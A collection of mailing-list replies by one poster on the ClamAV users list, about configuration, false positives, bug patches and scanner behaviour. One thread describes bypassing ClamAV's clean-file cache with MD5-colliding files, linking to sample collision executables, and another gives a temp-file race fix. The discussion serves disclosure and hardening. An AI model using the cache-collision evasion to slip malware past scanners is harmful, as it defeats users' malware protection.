Re: [Clamav-users] Need help with additional setup

[Sarocet]

Jonn Taylor wrote:
> I have been using clamav for several years and its been working well. 
> Recently a lot of emails have been getting though with virus's and 
> trojan's. I am using CommuniGate Pro with the CGPAV filter to send the 
> email to be scanned. Are there and additional databases or configuration 
> that I could add to help?
>   

You could add sanesecurity databases.
http://www.sanesecurity.co.uk/databases.htm

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] false positives for

[Sarocet]

George Geller wrote:
> Recently, the scan has been giving me:
>
> sda1/Program Files/Microsoft Office/Office12/EXCEL.EXE: 
> W32.Virut.Gen.D-163 FOUND
> sda1/Program Files/Microsoft Office/Office12/excelcnv.exe: 
> W32.Virut.Gen.D-163 FOUND
> sda1/WINDOWS/SoftwareDistribution/Download/754e3b95d1b56e045c85bd49529d92b4/xlconv.cab:
>  
> W32.Virut.Gen.D-163 FOUND
> sda1/WINDOWS/SoftwareDistribution/Download/488b87313a382b81238c79301c751bbd/excel.cab:
>  
> W32.Virut.Gen.D-163 FOUND
> sda1/WINDOWS/Installer/789ce7.msp: W32.Virut.Gen.D-163 FOUND
> sda1/WINDOWS/Installer/789cfb.msp: W32.Virut.Gen.D-163 FOUND
>
> Since a full scan with Windows defender doesn't detect this issue and 
> http://virusscan.jotti.org/ shows that 789cfb.msp is virus free with all 
> programs except clam, I think this is a false positive.
>
> see http://wsms.wikiplanet.com/mediawiki/index.php/Clamscan for 
> additional details.
>
> Please advise.
>
> Thanks, George
>   
The third and fourth files contain the first and secodn, so it's the same.
Are they from reputable sources? Eg. are they digitally signed by Microsoft?

Just follow the usual procedure to report a false positive:
http://cgi.clamav.net/sendvirus.cgi

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] question about Clamav anti virus for old mac OS 9.2

[Sarocet]

G.W. Haywood wrote:
> Third, ClamAV _can_ be used to scan files on a machine.  But that's
> all it really does, it scans them and tells you if it thinks any of
> them might be infected.  That doesn't sound to me like what you want.
> I think you want something that will 'disinfect' them.  ClamAV doesn't
> do that.  It might tell you that a file is infected (it might even be
> right about that:) but it would then be up to you to decide what to do
> about it.  Now if you're scanning incoming mail, the decision is easy.
> You drop the mail and maybe send a message to the administrator of the
> system that is scanning the mail (NOT to the sender of the mail if you
> have any sense, because the address was most likely forged).  When you
> scan files on a computer, things are a little more complicated.  If a
> file is flagged as infected that might indeed mean that it's infected.
> You might then think that you have to do something to the file, to
> disinfect it.  Or maybe just delete it.  But it could also mean that
> it's an important system file that just happens to look like it's
> infected.  This would be what we call a 'false positive'.  You need to
> be able to make an educated guess (er, decision) about these things,
> to distinguish between genuine infections and false positives, because
> if you just romp around your operating system deleting all the files
> which trigger ClamAV (or any other virus scanner) you might find that
> you've done more damage to the operating system than the virus would
> ever have done.
>   

Well, other AV products face the same issue. They may ask you your
decision in a messagebox
instead, or take a decision for you. But all of them have false
positives, and they do sometimes
break your OS by decididing to remove some system file.



Julie wrote:
> I have been told by the computer engineers who have been helping me try to
> get to the bottom of this that the virus is contained in Microsoft Office
> Word 2001, and does not affect any other systems, so that sending emails is
> perfectly safe and will not endanger any other computer.
Yes. *As far as you don't send Office files with your email*.


Tom Shaw wrote:
> For 2004 and before, I can't remember what to 
> do for these older versions of MS Office but you can set up these to 
> warn you if a document contains VB Macros.
>   
It's a program option (Tools/Options). It said something like "Ask me
when I open files with macros"
or "Disable files with macros".

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Yet more clubbing of deceased equine.

[Sarocet]

Simon Hobson wrote:
> If anyone was running an old enough 0.95 version, then their software
> wouldn't have died, they would have seen update errors in their logs,
> and the fix would have been to change just one or two hostnames in
> their freshclam.conf. 

The new hostname updates would still have needed the kill signature.
Otherwise, you have the same problem as before, but with a different
hostname.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] No debian woody support anymore?

[Sarocet]

Nathan Gibbs wrote:
> Here is what I absolutely do not like about this or agree with.
>
> The very possibility of there being a kill sig.  One specially crafted sig
> could kill the virus protection on every server & workstation in our company.
>
> Allowing the ClamAV Team to remotely nuke a level of our defenses is not
> acceptable.  ( ClamAV Team, correct me if I've got this wrong. )
>
> Obviously, we are betting the farm on solutions provided by these guys.
> However, the level of the farm's protection is my responsibility not theirs.
> With the public demo of a kill sig capability, I learn that they CAN & WILL
> mess with something that is my responsibility.
>
> Tactically my "kingdom" could be invaded by the ClamAV Team at any time, &
> they have already invaded others.
>
> That is a concept that I will never agree with.
>   
The ClamAV team didn't design the AV to stop on getting a special signature.
That signature could exist due to a bug that you decided not to fix (by not
updating/patching).
It was a clever use of a bug to disable the daemon.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Reload process

[Sarocet]

Török Edwin wrote:
> A simpler form of this is already implemented in 0.96 :)
>
> If a file is determined to be clean, its MD5 is added to an in-memory cache.
> When scanning a new file, its MD5 is computed and looked up in the
> cache. If found, it is considered clean.
> On DB reload the entire cache is cleared.
>
> Best regards,
> --Edwin
>   

Create two files with a colliding md5. One is innocuous, the other is
infected.
Send the clean one first. clamav will note it is clean and cache the md5.
Send the malicious one after a while. The hash in on the cache so it
bypasses the AV.
Profit.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Reload process

[Sarocet]

Tomasz Kojm wrote:
> On Mon, 24 May 2010 22:22:46 +0200 Sarocet wrote:
>   
>> Create two files with a colliding md5. One is innocuous, the other is
>> infected.
>> Send the clean one first. clamav will note it is clean and cache the md5.
>> 
> The cache also checks file sizes
>
>   
>> Send the malicious one after a while. The hash in on the cache so it
>> bypasses the AV.
>> Profit.
>> 
> Good luck,
>   

I don't need to be specially lucky.
It's just one google search away.
http://www.mscs.dal.ca/~selinger/md5collision/

Download these to files:
http://www.mscs.dal.ca/~selinger/md5collision/hello.exe
http://www.mscs.dal.ca/~selinger/md5collision/erase.exe

Both files have the same filesize (6144) and md5
cdc47d670159eef60916ca03a9d4a007
The first one salutes the world. The second one erases the drive (or so
it says :)

Md5 is broken, guys.


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Reload process

[Sarocet]

Tomasz Kojm wrote:
> These are poor examples, which are almost identical (only 6 bytes
> differ). Now, take a notepad.exe and create a malicious file with the
> same file size and MD5.
>
> Thanks,
>   

Read again the scenario.
Both files are created by the attacker. When the AV marks as clean the
first one,
the second can then go unnoticed durint a window frame, even if the AV
would
otherwise detect it.



___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Reload process

[Sarocet]

Tomasz Kojm wrote:
> This scenario makes no much sense to me. First of all, as I wrote in the
> previous email the files you provided as example are almost identical
> (they only differ in high nibbles of six bytes) and they share the same
> "payload", this means that both of them should be detected by the AV as
> malicious (in this case even using a single MD5 signature!). Due to the
> nature of MD5 weaknesses it's pretty much impossible to create a working
> malicious file that would have the same MD5 as, let's say notepad.exe.
>   
What if it's an autoextracted file? ClamAV detects the inner compressed
virus
but not the executable heading.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Reload process

[Sarocet]

Tomasz Kojm wrote:
> Sarocet wrote:
>   
>> What if it's an autoextracted file? ClamAV detects the inner compressed
>> virus
>> but not the executable heading.
>> 
> I don't get it.. if ClamAV detects a virus in any extracted file it
> marks the whole container infected
>   

Container extracts to Good_file
Container' extracts to Bad_file

md5(Container) = md5(Container')

ClamAV has a signature matching Bad_file.



Dennis wrote:
> A miracle occurs and the second file is executed and takes over the
> system.
I'm aware that there are other, easier ways to bypass the AV (eg. pack
it on a
executable created just for that).

But how good is an AV software that sometimes doesn't find a virus it
knows about? :)

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] invalid magic number in header

[Sarocet]

Török Edwin wrote:
> On 05/25/2010 10:50 PM, Blackburn, Marvin wrote:
>   
>> I started getting this a couple of weeks ago and can't seem to find out
>> what is causing it
>>
>>  
>>
>> LibClamAV Warning: Incorrect magic number in optional header
>>
>> 
> Looks like a PE executable that is neither PE32, neither PE32+ ...
> That would only be loaded by win98 though AFAICT, see
> https://wwws.clamav.net/bugzilla/show_bug.cgi?id=119
>
> What file is it?
>
> Best regards,
> --Edwin
Maybe it is a 16 bit app (New Executable) ?
They will load up to Windows XP.


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Problem with lha, lzh, uuencode and pgp files

[Sarocet]

DAVID BERTHIAU wrote:
>> None of the AVs detect that (and none should, it is an encrypted file):
>> http://www.virustotal.com/analisis/21c94279acf534fe49c32289dbe22cff12ec1006>b09ef2e6ac31066e2d943cfb-1276179996
>> 
> Sorry, but I am not agree with you because my current system (trend micro 
> IWSS) detect everything as malicious (even on http://techlabs.bluecoat.com/ 
> and on http://securite-informatique.info/virus/eicar/)
>   
May I ask how is it able to decrypt such file without the appropiate
private key?

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] TK53 Advisory #2: Multiple vulnerabilities in ClamAV

[Sarocet]

Chris wrote:

Saw this link at SANS today, anything to it?

http://seclists.org/fulldisclosure/2007/Dec/0625.html

Or is this a rehash of something already known about

I'm not a clam developer, but here's my view about them:

It lists three "vulnerabilities"
1- cli_gentempfd is  vulnerable to a race condition attack.
It's a bug. O_EXCL needs to be added to libclamav/others.c line 847. Not 
fixed yet on  trunk.

Attacker needs a local account.

I'm attaching a patch for it, so you can patch and rebuild your version.

2- ClamAV fails to properly check for base64-UUEncoded files, allowing 
bypassing of the scanner through the use of such files.


Not really a bug. Having ClamAV check those files would be an *enhacement*.

3- Sigtool utility overwrites files when utf16-decoding.
I'm not sure that it's a vulnerability. It's run by the user, which 
could be willing to overwrite it.
Adding an "overwriting file" warning would be a good idea, but denying 
to write an existing file
could break some scripts (and if you were to add an overwrite flag the 
"danger" is exactly the same as now).

Only dangerous if you have sigtool suid.
Index: libclamav/others.c
===
--- libclamav/others.c  (revision 3475)
+++ libclamav/others.c  (working copy)
@@ -492,7 +492,7 @@
 if(!*name)
return CL_EMEM;
 
-*fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU);
+*fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY|O_EXCL, S_IRWXU);
 if(*fd == -1) {
cli_errmsg("cli_gentempfd: Can't create temporary file %s: %s\n", 
*name, strerror(errno));
free(*name);
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] TK53 Advisory #2: Multiple vulnerabilities in ClamAV

[Sarocet]

Ed Kasky wrote:
> At 06:07 AM Monday, 12/31/2007, you wrote -=>
>   
>> Chris wrote:
>> 
>>> Saw this link at SANS today, anything to it?
>>>
>>> http://seclists.org/fulldisclosure/2007/Dec/0625.html
>>>
>>> Or is this a rehash of something already known about
>>>   
>> I'm attaching a patch for it, so you can patch and rebuild your version.
>>
>>
>> --- libclamav/others.c(revision 3475)
>> +++ libclamav/others.c(working copy)
>> @@ -492,7 +492,7 @@
>> if(!*name)
>> return CL_EMEM;
>>
>> - *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU);
>> + *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY|O_EXCL, S_IRWXU);
>> if(*fd == -1) {
>> cli_errmsg("cli_gentempfd: Can't create temporary file %s: 
>> %s\n", *name, strerror(errno));
>> free(*name);
>> 
>
> FYI -
>
> When applying this patch, I get the following:
>
> "patch:  malformed patch at line 4: if(!*name)"
>
> Ed
>   

I don't have problems here. Which version are you using?
Note you can just manually add | O_EXCL The patch was just for convenience.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] TK53 Advisory #2: Multiple vulnerabilities in ClamAV

[Sarocet]

Steve Holdoway wrote:
> IME patches always get mangled if included in an email, tabs to spaces, etc. 
> Putting it in an attachment keeps the internal formatting and usually works.
>
> Just my $0.02,
>
> Steve
>   
It was sent as attach. But inline in Ed Kasky reply. Some e-mail clients 
will show next multipart message if it's of text type.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] Official kubuntu 7.10 and wubi-cdboot.exe

[Sarocet]

Davide wrote:
> Hi, I am a little surprise because clamav find a virus (Adware.Fakealert-21) 
> in
> the wubi-cdboot.exe of the official kubuntu-7.10-desktop-i386.iso
>
> My question is:
>
> A) It is a false positive ?
> B) It is a sad case ?
>
> Does anyone obtain the same result ? With another antivirus ? Does anyone
> know this Adware.Fakealert-21 ?
>
> I have posted the question at the kubuntu forum too:
>
> http://kubuntuforums.net/forums/index.php?topic=3090110.
Just a guess, but maybe kubuntu comes with some virus signatures / 
anti-virus code that is being detected as the virus?

Try mounting the iso and scanning the folders to restrict where is the 
problem located.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] What's this? I can't believe it!

[Sarocet]

Dennis Peterson wrote:
> Nobody has actually tested the files to see if they are Windows executables 
> that I've 
> seen. It is entirely possible they could be Linux executables. File 
> extensions don't 
> mean much on a Linux system but it seems from this thread a great way to pass 
> around 
> Linux viruses is to tack on a .exe extension and a lot of people will ignore 
> them to 
> their great peril.
>
> dp
Well, if you ignore the file i don't see how it's going to run. 
Moreover, it's less likely you will write ./Foo.exe as
you're already assuming by the extension that it wouldn't work, so why 
do it?
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] What's this? I can't believe it!

[Sarocet]

Dennis Peterson wrote:
>
> Some of us run mail equipment that sits in front of very large corporations 
> and it is 
> incumbent upon us to know what we have so we don't have to make excuses later.
>
> And some people, not you or I of course, are idiots and will do what ever is 
> possible 
> to help blackhats make a buck.
>
> dp
>   
I agree with you. Some people deserve being removed the right to +x 
anything.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] Virus in clamav-0.92.1.tar.gz detected

[Sarocet]

Svetlana V.Vyslanko wrote:
> NOD32 detected virus Win32/Statik in clamav-0.92.1.tar.gz
>   
Win32/Statik is an heuristic signature. It's probably detecting some signatures 
in the clamav package.


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] Memory usage for clamd is huge

[Sarocet]

Dennis Peterson wrote:
> I think he's suggesting that he'd prefer you not mail him because of 
> your idiot policy on outgoing virus scanning. I agree with him. I'm sure 
> I'm not the only one who would blacklist you right now because of your 
> policy if we knew your outgoing smtp IP.
>   
Scanning outgoing email is not something i think such useful and it's a 
nuisance for its users,
but how does it deserve for a smtp ban?


PS: Note that he didn't explicitely said he was scanning outgoing mail.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] WARNING: Suspicious recipient address blocked

[Sarocet]

Michael Brown wrote:
> The | character is not allowed in any e-mail address because it's a Unix 
> shell reserved character.
>
> Here's a list right off the top of my head that are usually 
> blocked/disabled by just about every MTA out there.
>
>1. Control Characters
>2. Space
>3. !
>4. "
>5. #
>6. $
>7. %
>8. &
>9. (
>   10. )
>   11. *
>   12. ,
>   13. /
>   14. :
>   15. ;
>   16. <
>   17.  >
>   18. @ (when used more than once)
>   19. [
>   20. \
>   21. ]
>   22. |
>   23. DEL

The characters was passed to apopen call, thus to be escaped for a shell.

The application shall quote the following characters if they are to 
represent themselves:

|  &  ;  <  >  (  )  $  `  \  "  '  


and the following may need to be quoted under certain circumstances. 
*   ?   [   #   ˜   =   %

It's then up to $SENDMAIL_BIN to reject the address for having an embedded 
newline :)

  


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] No supported Database

[Sarocet]

Brian Morrison wrote:
> Dennis Peterson wrote:
>   
>>> Yes, I realise that. I run clamd under user clamav, hence it's probably 
>>> easier to access /var/lib/clamav/* than it would be if owned by root.
>>>   
>> Why would that be? It is no more work to crack the root account than any 
>> other account. Nor any less. Hopefully too your clamav account has no 
>> shell defined.
>> 
>
> Indeed not.
>
> A local exploit is one thing, a local root exploit quite another. Now of 
> course it's more dangerous to run clamav as root, but for limiting write 
> access to the databases it would be better to have ownership as root. 
> Might not be worth it on balance, but I'm merely asking to see what the 
> developers' thought processes were rather than saying for sure what 
> would be better path to follow.
>   
We're talking about accesing to a different account. That being the root 
one or a daemon one
shouldn't make a difference. Perhaps you will trick user bin into 
visiting a malicious website?

The only scenario i can think it makes a difference would be if you had 
that part of the directory
 tree exported on nfs. You could have similar problems with other remote 
access tools which by
default block root access, but most won't allow you without a shell. And 
you shouldn't rely on the
defaults without at least studying the config anyway.

However, if you know where it makes a difference, please share.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] List

[Sarocet]

Andy Loates wrote:
> Is this list still alive?
>
> Last post received on 7/4/08.
>
> No monthly email reminder today.
>
> Checked website, my user options for this list all seems ok.
>
> Hope to hear from someone!
>
> Andy Loates
>   
CCing you as it seems you don't receive from the list. Yes, it's still 
alive. I have received 367 mails to it since 7th April 2008 till your mail.
You can check the archives and see there were. Don't know what happened 
to your subscription, though. Perhaps it's a silly configuration
mistake, or they're all being flagged as spam.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] Linux Virus on Vista VM

[Sarocet]

[EMAIL PROTECTED] wrote:
> Hello, 
>
> This is the virus that is found by ClamXav on Vista VM. McAfee does not find 
> it. It is only found by ClamXav. When I search the web for the string 
> nothing turns up. So someone please tell me what is this virus? Where does 
> it come from? Can it do any harm to macintosh and why no other av software 
> appears to be finding it? ClamXav uses the database of Clamav. 
>
> 564d488d-5af8-2b27-c071-26856caccd4f.vmem: Linux.Lionworm FOUND 
>
> Cheers 
I also found it, on the pagefile of a windows box which had no 
relationship with linux. It's too big
to send it anywhere (plus i don't know which data could be there). But i 
saved the file and can provide
what it's matching if needed.
I guess it's a too generic signature (though i'm quite lazy to see which 
signature it has).
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] Freshclam not terminating correctly

[Sarocet]

Robert Blayzor wrote:
> I've been noticing a problem for quite some time now on our mirror  
> server. (I posted this issue to the devel list, but there have been no  
> responses).
>
> I'm noticing some buggy client behavior that seems it's from freshclam  
> clients.  Over time on our mirror we notice 1000's of connections can  
> build up over time with clients stuck in a half-opened state. (or half- 
> closed).  As clam becomes more popular and traffic picks up on the  
> mirrors, I notice more and more of these stuck clients.  It becomes  
> dangerous to the mirror at one point because if there are thousands of  
> these lingering around, they can run the server out of socket space.
>
> Basically what we see happen is that when Apache closes the connection  
> it will send the FIN to the client, sending it into FIN_WAIT_1, in  
> which case the client should answer with a FIN+ACK, but that doesn't  
> happen.  The client will respond with an ACK and zero sized window.
>   
Seems like a problem with the TCP stack to me. No client of normal 
sockets should be abel
to do that. Do you have some device (such a firewall) in front of that 
machine which could
be interfering? Could you fingerprint (p0f) from which OS come this 
activity?
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://lurker.clamav.net/list/clamav-users.html

Re: [Clamav-users] Malformed database problem

[Sarocet]

Chambers, Phil wrote:
> I have looked at the source code and there are numerous places where it
> detects problems with signature, but they all generate the same failure
> message: "Malformed database".
>
> It is going to take me a very long time to patch the code to make it
> generate different error messages for each case where a signature can be
> malformed, so that I can diagnose my problem, but I see no alternative.
>   
Search text "Malformed database" replace all ocucrrences by "File " 
__FILE__ " encountered a malformed database on line " STRINGIFY(__LINE__)

And globally define this:
  #define STRINGIFY2(x) #x
  #define STRINGIFY(x) STRINGIFY2(x)

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Malware Scanning and blocking

[Sarocet]

Sain, David J. wrote:
> I want to setup a linux box with smoothwall, ipcop or some other
> opensource internet security application (preferably linux based) at
> home, but don't know how ClamAV might handle things like Antivirus 2008
> that make fraudulent claims and are considered malware.
>  
> I searched archives, but don't come up with hits on [ malware "antivirus
> 2008" ] which is a specific thing we deal with at work on a regular
> basis (I'm a consultant.  One firm we have a Sonicwall tz190 which
> blocks malware and virus' quite well, but sometimes at the expense of
> other things, like lunix updates)
>  
> http://officialantiviruslab.com/?gclid=COu1jrK5rpUCFQ0MIgodJHujbw
> http://onlineantivirus2009.com/?gclid=COCnhYG5rpUCFRKAxgodpF7KbA
>
>
> Any thoughts?
>  
>
> Thank you,
>
> David
>   
See the 'Sanesecurity: new database' recent thread 
http://lurker.clamav.net/thread/20080818.151714.69360cff.en.html
It annunces the addition of http://sanesecurity.co.uk/clamav/rogue.htm 
signatures for "known Rogue Anti-Virus
software and also contains known Fake Videos/Codecs." Given the 
reference about fake news,
I think 'antivirus 2008' will be listed there.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] ClamAV 0.94 build problem on Cygwin

[Sarocet]

René Berber wrote:
> "serious problems" ?  Only problem is the test I mentioned, passing a
> file descriptor is not supported under Cygwin as far as I know.
>   
I have no cygwin experience, but Windows *does* allow passing file 
descriptors to child process. Not in the same way as unix, but I'd find 
odd the cygwin guys didn't manage to adapt that, given that they were 
able to do much more complex things, such as emulating fork()
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] PUAs

[Sarocet]

Tilman Schmidt wrote:
>>> Sub-Type: IRC
>>> Description: IRC server based programs/malware
> I don't use IRC myself, but respectable people keep telling me
> that it's not for bad guys only, there are legitimate uses for
> it, and I should try it myself to see. So I am a bit reluctant
> to declare all IRC server based programs "possibly unwanted".
By IRC Server based programs do you mean IRC servers or IRC clients?
I thought it referred to the later, but the phrase is strange.
You wouldn't want to forbid mIRC just as you wouldn't want to match
MSN Messenger or Yahoo! Messenger. Unless you have a "no chat" policy,
it's a perfectly legit program and banning may trouble many users. *But*
many botnets use the mIRC program, having its code just as a mIRC script.
If the user knows that it has that program, it's ok. No so much if it 
has been
subrepticiously installed by a worm. I'd recommend to download from
http://mirc.co.uk/ instead of sending by email, though.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] How important are file extensions?

[Sarocet]

Tilman Schmidt schrieb:
> Roberto Ullfig schrieb:
>   
>> We'd like to rename the attachments with another suffix, 
>> one that will never be used for an application (present or future). Does 
>> anyone know if a standard suffix has been created for just this purpose?
>> 
>
> Such a suffix does not and cannot exist. There is no regulation or
> assignment authority for file suffixes. Every Windows program can claim
> and use any suffix it likes.
> What's more, even if a suffix is not assigned to any program by default,
> when the user tries to open a file with that suffix on a particular
> Windows installation the system will cheerfully offer him or her to choose
> a program for opening it, which it will by default permanently associate
> with that suffix, and then it isn't unassigned anymore.
> So no suffix you try to put aside will ever be safe from being assigned
> to an application, either by the application's author or by individual
> users.
>
> HTH
> T.
>
>   
You could rename to .executable-renamed-$RANDOM
Name is descriptive enough so noone will want to use it for something 
other than executables.
Yet it isn't constant so users won't be able to place an association to 
the program. And beginning the
extension with .exe, you're making life easier for your users when they 
want to rename attachments
back: they just need to remove the end of the extension.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Handling of unknown configuration lines (was Re: Stop it!)

[Sarocet]

Aecio F. Neto wrote:
> I don't agree with that, but let me put another option:
> 1) Break on unknown options
> 2) Ignore obsolete options and warn OP
>
> If any Op (or poor user) adds an option like
> PleaseClamAVCleanInfectedFilesForMe yes
> and expects it to work, are you really sure that the software should not
> ignore this?
>
> I see no difference from mine example to yours, because one should
> understand at minimum which options are availble before adding one he
> *thinks* exists.
That doesn't address typos. You can know by heart the configuration 
options, even be the program developer, but mistype the config file.
So the program should at least loudly complain when you try to run it 
with such option.
___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] ClamAV Webinar on 4th March

[Sarocet]

Nigel Horne wrote:
> s...@softhome.net wrote:
>>> For further details, including how to listen to the broadcast and
>>> Alain's biography, please visit
>>> http://www.clamav.net/2009/02/09/clamav-users?-webcast/ 
>>>   
>
>   
>> Please check the above link. There seems to be a problem with it. Thanks 
>> 
>
> Thanks for point this out.
>
> The problem lies with the mailing list software which munged the URL. To 
> find out the details please visit www.clamav.net, scroll down to the 
> news section then click on the title of the ClamAV Users' Webcast entry 
> - that will take you to the page where you can find out more about the 
> Webcast.
>
> -Nigel

Easier instructions: Remove the ? from the above url.

Which unless I'm also munged would be:
http://www.clamav.net/2009/02/09/clamav-users-webcast/

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Signatures for documents exploiting CVE-2009-0658?

[Sarocet]

Adam Stephens wrote:
> The other day we got mailed a wave of PDF files aimed at exploiting 
> CVE-2009-0658.
>
> Does anyone have working generic signatures for documents with this 
> exploit in? I've made an MD5 signature* for the particular document we 
> got, & submitted it, but I know there are plenty of other similar 
> documents out there... and I can't see how to make a generic signature 
> myself without unpacking the PDFs with pdftk first.
>
> Cheers,
> Adam.
>
> * That's c8cab28e550f60468099f60a0b6ccb81
>   
I think that core clamav should be changed for better pdf support in
order to catch all different
ways it can be disguised.

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] ClamAV and VirusTotal

[Sarocet]

Julio Canto wrote:
> Paul Whelan escribió:
>   
>> must be the clamwin version then  which is a 
>> strange 'official 
>> channel'.
>> 
>
> Hi again,
> You're wrong assuming that, therefore you should not accuse us of using
> 'strange official channels'. All engines and parameters used - including
> the ones from ClamAV - at VirusTotal are decided and provided with the
> vendors involved
The wording doesn't seem to "En el caso de ClamAV se ha optado por
ClamWin Free Antivirus". It looks like an
internal decision to use ClamWin, not that the ClamAV developers
recommended it.

http://www.hispasec.com/unaaldia/2080

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Update to the signatures.pdf

[Sarocet]

Nathan Brink wrote:
> There is an option for echo that removes the linefeed:
> ohnobi...@ohnopublishing ~/html/anindex $ echo -n "How do I look in 
> hex?" |sigtool --hex-dump
> 486f7720646f2049206c6f6f6b20696e206865783f
>
> There is no reason to, but I prefer echo to printf. Maybe because printf 
> processes escapes such as ``%s'' and ``%%'':
> ohnobi...@ohnopublishing ~/html/anindex $ printf %%\\n
> %
>
> Maybe you should include a warning note about how printf will eat 
> certain characters ;-).
>   
echo -n is not standard. printf is.
If you don't want it to eat characters use

$ printf %s "Foo%%Bar"
Foo%%Bar

Beware of spaces splitting the text to the second argument, though.


___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml

Re: [Clamav-users] Anomaly when scanning a tar.gz file

[Sarocet]

Paul Kosinski wrote:
> 09:51:08 u...@host:~/src/openssl> clamscan -ri openssl-0.9.8k/
>
> --- SCAN SUMMARY ---
> Known viruses: 537879
> Engine version: 0.95
> Scanned directories: 134
> Scanned files: 2003
> Infected files: 0
> Data scanned: 13.86 MB
> Data read: 12.99 MB (ratio 1.07:1)
> Time: 10.665 sec (0 m 10 s)
>
>
>
> 09:51:24 u...@host:~/src/openssl> clamscan  openssl-0.9.8k.tar.gz
> openssl-0.9.8k.tar.gz: OK
>
> --- SCAN SUMMARY ---
> Known viruses: 537879
> Engine version: 0.95
> Scanned directories: 0
> Scanned files: 1
> Infected files: 0
> Data scanned: 35.54 MB
> Data read: 3.67 MB (ratio 9.68:1)
> Time: 14.661 sec (0 m 14 s)
> __
3.67MB + 18 MB + 13.86 MB = 35.53 MB plus rounding errors, the reported
35.54 MB.
(tar.gz size + tar size + uncompressed scanned size)

___
Help us build a comprehensive ClamAV guide: visit http://wiki.clamav.net
http://www.clamav.net/support/ml